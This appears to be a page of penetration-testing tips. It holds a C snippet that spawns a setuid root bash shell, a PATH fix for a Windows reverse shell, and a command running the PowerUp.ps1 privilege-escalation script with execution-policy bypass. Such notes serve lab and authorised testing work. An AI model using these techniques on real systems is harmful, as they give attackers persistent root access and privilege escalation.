Tips and Tricks

LOLBAS (Living Off the Land Binaries)

technique that is based on taking advantage of the system’s own binaries to cause significant damage in an attack, with a relatively low detection rate.

LOLBASlolbas-project.github.io

Compile SUID bash

If you find you can run command as root, you could compile a setuid bash for you! First create a c program:

int main(void)
{
    setuid(0);
    setgid(0);
    system("/bin/bash");
}

Compile (for x64):

gcc setuid.c -o <outputfile>

Set ENV in windows

In case Windows reverse shell throw error for basic command lke whoami and all, they this

set PATH=%SystemRoot%\\system32;%SystemRoot%;

Fixing Frozen PowerShell

May face this issue where you get cmd.exe shell and when you run powershell.exe, the shell frozes. 😟

Wayaround to run powerUp.ps1

# at the end of the line, add the following command
Invoke-AllChecks

# On your cmd shell, run powerup like this
powershell -ep byppass .\powerUp.ps1

# Bomm! mo frozen shell but results!!

PreviousAccess NextFile Transfer

Last updated 7 months ago

hashtagLOLBAS (Living Off the Land Binaries)

hashtagCompile SUID bash

hashtagSet ENV in windows

hashtagFixing Frozen PowerShell

hashtagWayaround to run powerUp.ps1

LOLBAS (Living Off the Land Binaries)

Compile SUID bash

Set ENV in windows

Fixing Frozen PowerShell

Wayaround to run powerUp.ps1